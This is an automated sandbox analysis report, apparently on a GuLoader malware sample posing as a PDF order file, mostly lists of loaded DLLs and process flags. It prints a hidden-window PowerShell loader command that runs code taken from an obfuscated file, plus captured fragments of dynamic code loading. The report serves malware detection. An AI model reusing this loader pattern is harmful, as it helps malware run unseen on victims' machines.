Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: microsoft.management.infrastructure.native.unmanaged.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: miutils.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wmidcom.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: aclayers.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: sfc.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: sfc_os.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: schannel.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: mskeyprotect.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: ncryptsslp.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: rasapi32.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: rasman.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: rtutils.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: dhcpcsvc6.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: dhcpcsvc.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Users\user\Desktop\Order requirements CIF Greece_pdf.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32 Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll Jump to behavior
Source: Order requirements CIF Greece_pdf.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 00000001.00000002.2047558142.0000000008AB0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: bqm.Core.pdb source: powershell.exe, 00000001.00000002.2042349403.00000000078DF000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: CallSite.Targetore.pdb source: powershell.exe, 00000001.00000002.2042349403.00000000078DF000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: re.pdb source: powershell.exe, 00000001.00000002.2042349403.00000000078DF000.00000004.00000020.00020000.00000000.sdmp

Data Obfuscation
barindex
Yara detected GuLoader
Source: Yara match File source: 00000001.00000002.2048865185.0000000009EB9000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Found suspicious powershell code related to unpacking or dynamic code loading
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: GetDelegateForFunctionPointer((Hamule $Organicism $provicariate), (Exceedingly @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Fanemarch = [AppDomain]::CurrentDomain.GetAssemblies()$glob
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($fraternation)), $Reguleringsordningers).DefineDynamicModule($Topklasser, $false).DefineType($Gader, $Agiel, [System.MulticastDelegate]
Suspicious powershell command line found
Source: C:\Users\user\Desktop\Order requirements CIF Greece_pdf.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "$Barthianismens=Get-Content -raw 'C:\Users\user\AppData\Roaming\skittaget\lektier\Familieskabet.Sch';$Architectures=$Barthianismens.SubString(9447,3);.$Architectures($Barthianismens) "
Source: C:\Users\user\Desktop\Order requirements CIF Greece_pdf.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "$Barthianismens=Get-Content -raw 'C:\Users\user\AppData\Roaming\skittaget\lektier\Familieskabet.Sch';$Architectures=$Barthianismens.SubString(9447,3);.$Architectures($Barthianismens) " Jump to behavior
Uses code obfuscation techniques (call, push, ret)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 1_2_04FDCA85 push eax; mov dword ptr [esp], edx 1_2_04FDCA8C
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 6_2_04220C66 push eax; retf 6_2_04220C70
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 6_2_04224E40 push ebx; ret 6_2_04224E52
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 6_2_04222E87 pushad ; ret 6_2_04222E88
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 6_2_04225902 push B417840Ah; retf 6_2_04225907
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 6_2_0422094F push ss; retf 6_2_04220958
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 6_2_042217B2 push ebp; retf 6_2_042217B3
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 6_2_04222FF1 push esi; ret 6_2_0422300A
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 6_2_042249CF push ebx; ret 6_2_042249D0
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 6_2_20F7891E pushad ; iretd 6_2_20F7891F
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 6_2_20F73AA1 push eax; ret 6_2_20F73CA5
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 6_2_20F78C2F pushfd ; iretd 6_2_20F78C30
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 6_2_20F78DDF push esp; iretd 6_2_20F78DE0

Hooking and other Techniques for Hiding and Protection
barindex
Loading BitLocker PowerShell Module
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1 Jump to behavior
Source: C:\Users\user\Desktop\Order requirements CIF Greece_pdf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Contains long sleeps (>= 3 min)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 600000 Jump to behavior
